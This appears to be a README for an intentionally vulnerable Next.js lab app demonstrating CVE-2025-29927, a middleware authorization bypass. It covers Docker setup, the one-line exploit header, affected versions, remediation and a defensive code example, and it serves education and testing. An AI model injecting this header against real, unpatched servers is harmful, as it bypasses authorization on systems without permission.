## https://sploitus.com/exploit?id=FA94DA94-2BC0-5F55-AA5C-5CFDB7BE5648
# ๐Ÿ•ท๏ธ Next.js CVE-2025-29927 

## ๐Ÿง‘๐Ÿปโ€๐Ÿ’ผ Legal Disclaimer

This project is a [Next.js](https://nextjs.org) application that has been **intentionally configured to be vulnerable** to an Authorization Bypass in Next.js Middleware ([CVE-2025-29927](https://github.com/advisories/GHSA-f82v-jwr5-mffw)). It is provided **solely for lawful, educational, and research purposes**.

By accessing, using, or distributing this code, you acknowledge and agree that:

- You will **only use this project in controlled environments** (such as local test labs or legally authorized systems).
- You will **not attempt to exploit this vulnerability on any system** for which you do not have explicit, written permission.
- The maintainers of this project **do not condone or encourage any unauthorized or malicious activity**, and expressly disclaim any liability for misuse of this code or information.

## 🛫 How To Run

Install [Docker](https://docs.docker.com/engine/install/) and then run:

```bash
docker build -t next-cve-2025-29927 .

docker run -p 3000:3000 next-cve-2025-29927
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.


## ๐Ÿ‘ฉโ€๐Ÿซ How To Exploit the Vulnerable app

Capture the request using an intercepting proxy such as ZAP or Burp, and inject the following header into the request:

`x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`



## 📑 Affected versions

- `>= 13.0.0, < 13.5.9`
- `>= 14.0.0, < 14.2.25`
- `>= 15.0.0, < 15.2.3`
- `>= 11.1.4, < 12.3.5`

## ๐Ÿ› ๏ธ Remediation

Patch to the latest versions 

13.5.9

14.2.25

15.2.3

12.3.5

or if you cannot update, block the requests which contain the `x-middleware-subrequest` header.
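The two remediation paths above, as an added example that is not part of the original project: `isAffected` checks an installed version against the ranges listed on this page, and `withSubrequestGuard` rejects any request that carries the header. The function names and the 403 response are assumptions made for this example.

```javascript
// Added example, not the project's code. Ranges are copied from the
// "Affected versions" list: [first affected, first fixed).
const AFFECTED_RANGES = [
  ['11.1.4', '12.3.5'],
  ['13.0.0', '13.5.9'],
  ['14.0.0', '14.2.25'],
  ['15.0.0', '15.2.3'],
];

// Accept only plain x.y.z; pre-release tags need a manual check.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  if (!m) throw new Error(`unsupported version string: ${v}`);
  return m.slice(1).map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True when the installed Next.js version falls inside a listed range.
function isAffected(version) {
  const v = parseVersion(version);
  return AFFECTED_RANGES.some(([min, fixed]) =>
    compareVersions(v, parseVersion(min)) >= 0 &&
    compareVersions(v, parseVersion(fixed)) < 0);
}

// Wraps a Node (req, res) handler and rejects any request carrying the header.
// It has to run ahead of Next.js (custom server or proxy layer): the bypass
// skips middleware, so a check placed inside middleware never executes.
function withSubrequestGuard(handler) {
  return (req, res) => {
    // Node lowercases incoming header names in req.headers.
    if ('x-middleware-subrequest' in req.headers) {
      res.statusCode = 403;
      res.end('Forbidden');
      return;
    }
    return handler(req, res);
  };
}
```

In a Next.js custom server, wrap the handler returned by `app.getRequestHandler()` with `withSubrequestGuard` before passing it to `http.createServer`.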


## ๐Ÿ™‡๐Ÿปโ€โ™‚๏ธ Learn More

To learn more about the vulnerability, take a look at the following resources:

- [Exploring CVE-2025-29927: A Hands-On Look at Authorization Bypass in Next.js Middleware](https://www.riccardosirigu.com/blog/exploring-cve-2025-29927-a-hands-on-look-at-authorization-bypass-in-nextjs-middleware/) 
- [inzo_ and zhero, who disclosed the vulnerability](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)
- [Next.js Advisory on Github](https://github.com/advisories/GHSA-f82v-jwr5-mffw)
- [CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)